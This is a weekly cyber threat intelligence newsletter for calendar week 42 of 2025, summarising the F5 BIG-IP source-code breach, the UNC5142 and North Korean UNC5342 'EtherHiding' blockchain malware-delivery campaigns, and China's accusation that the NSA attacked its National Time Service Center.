The Signal CW42 2025: F5 Breach, Mandiant Blockchain & China Timekeeping Hack
The Signal CW42 2025
Welcome to The Signal -> your weekly dose of what truly matters in Cyber Threat Intelligence.
Each week I cut through the noise to highlight the key breaches, underground movements, and vulnerability trends shaping the global cyber landscape.
No hype. No buzzwords. Just signal.
F5 Breach: Nation-State Hack Exposes Source Code and Vulnerability Data
F5 Networks is a U.S.-based company specializing in application delivery and security solutions. Its product line, BIG-IP, is widely used by governments and major enterprises to manage network traffic, balance loads, and secure applications at the edge of their infrastructure. Because of its central role in global IT environments, F5 technology is often found in critical network paths of banks, telecom providers, and government agencies.
In August 2025, F5 detected a long-term intrusion by a highly sophisticated nation-state actor, reportedly linked to China (Reuters). The attackers had maintained persistent access to internal systems, including the BIG-IP product development environment and engineering knowledge platforms. During this time, they exfiltrated parts of the BIG-IP source code, internal information about unpatched vulnerabilities, and a small amount of customer configuration data (F5).
The scale of the breach is notable because BIG-IP products are deployed by 48 of the world’s 50 largest corporations. With access to both source code and undisclosed vulnerabilities, the attackers potentially gained valuable insight into how these systems operate, increasing the risk of future exploitation. Although the investigation found no evidence of tampered updates or backdoors, the incident demonstrates how deeply embedded vendors can become prime targets for state-sponsored espionage.
Independent cybersecurity firms, including CrowdStrike, Mandiant, NCC Group, and IOActive, confirmed that no customer-facing or financial systems were affected and that no malicious code was introduced into distributed software. However, government agencies such as CISA and the UK’s NCSC have warned of an imminent threat to organizations using F5 products and issued directives to apply patches and enhance monitoring (Ars Technica). F5 also published a threat-hunting guide to help customers detect suspicious activity.
Sources
UNC5142 – EtherHiding as a New Model for Malware Distribution
Since late 2023, Mandiant and Google Threat Intelligence Group (GTIG) have tracked UNC5142, a financially motivated threat actor that pioneered EtherHiding -> the use of blockchain smart contracts to store and deliver malicious code.
UNC5142 compromises vulnerable WordPress websites and injects a JavaScript downloader called CLEARSHORT, an evolution of CLEARFAKE. When a visitor loads an infected site, the script connects to the BNB Smart Chain, fetches encrypted payloads from smart contracts, and displays fake prompts such as Chrome updates or CAPTCHA checks to trick users into running malicious commands.
Over time, the group adopted a three-layer smart contract structure (router, logic, storage) and AES-GCM encryption, making its campaigns highly agile and resilient. The actor also abused Cloudflare Pages to host fake verification pages.
UNC5142’s campaigns delivered various infostealers including VIDAR, LUMMAC.V2, RADTHIEF, and ATOMIC for macOS, using multi-stage loaders (HTA → PowerShell → in-memory execution).
By mid-2025, about 14,000 compromised websites were linked to UNC5142, though no new activity was observed after July 2025, suggesting a tactical pause or shift.
UNC5142 demonstrates how blockchain infrastructure can be repurposed for mass malware distribution —> offering low-cost and decentralized operations that are difficult to take down.
UNC5342 (DPRK) – Nation-State Adoption of EtherHiding
At the same time, GTIG identified UNC5342, a North Korean state-backed group, using the same EtherHiding concept for espionage and cryptocurrency theft.
Since February 2025, UNC5342 has used EtherHiding in its Contagious Interview campaign, where fake recruiters lure software developers with fraudulent job offers. During fake technical tests, victims are asked to download files that deploy the JADESNOW JavaScript downloader, which interacts with BNB Smart Chain and Ethereum to fetch further payloads stored in smart contract data or transaction calldata.
The final payload, INVISIBLEFERRET.JAVASCRIPT, acts as a persistent backdoor and credential stealer targeting browsers, password managers, and crypto wallets.
UNC5342 frequently updates its contracts for less than two dollars per change and switches between blockchain networks to evade detection -> showing how state actors now adapt cybercriminal methods.
This campaign combines financial motives, such as crypto theft, with strategic intelligence collection and shows how decentralized Web3 ecosystems are being abused for persistence and control.
Takeaway
- UNC5142 created and refined EtherHiding as a crimeware technique for large-scale malware delivery.
- UNC5342, a state-sponsored actor, later adopted and improved the same method for targeted espionage and financial gain.
- Both reports were published on October 16th, 2025 by GTIG.
Sources
China Accuses US NSA of Cyberattacks on National Time Service Center
China’s Ministry of State Security (MSS) has accused the US National Security Agency (NSA) of carrying out a long-term cyberattack campaign against the National Time Service Center in Xi’an -> a key institution under the Chinese Academy of Sciences responsible for maintaining and broadcasting China’s official time (Bloomberg).
According to the MSS, the NSA exploited vulnerabilities in foreign-brand smartphones used by center employees as early as March 2022 to steal sensitive data and later used stolen login credentials to infiltrate internal systems (Reuters).
Between August 2023 and June 2024, the NSA allegedly deployed 42 advanced cyber tools and “state-level cyberespionage weapons” targeting multiple internal networks, including China’s high-precision ground-based timing infrastructure (SCMP), (AP).
The MSS said the operations were highly covert and launched mainly during nighttime hours in Beijing, using virtual private servers in the United States, Europe, and Asia to disguise their origin (Global Times)
Chinese cybersecurity experts warned that successful interference with the national time system could have triggered cascading effects across critical sectors such as communications, finance, power distribution, and satellite navigation. Even millisecond deviations in timing, they said, could disrupt financial markets or cause power grid failures (SCMP).
Authorities stated that the MSS had guided the center to cut off attack chains and enhance defensive measures. Investigations also traced the NSA’s use of encrypted communication channels, forged digital certificates, and obfuscation techniques to evade detection (Global Times).
The NSA and the US Embassy in Beijing have not issued any official response to the allegations (Bloomberg), (Reuters).
Beijing framed the incident as another example of Washington’s “cyber hegemony” and violation of international norms in cyberspace (Global Times).
The accusations mark the latest escalation in the ongoing cyber and geopolitical rivalry between China and the United States, coming amid renewed trade tensions and mutual claims of state-sponsored hacking campaigns (Reuters), (SCMP).
Sources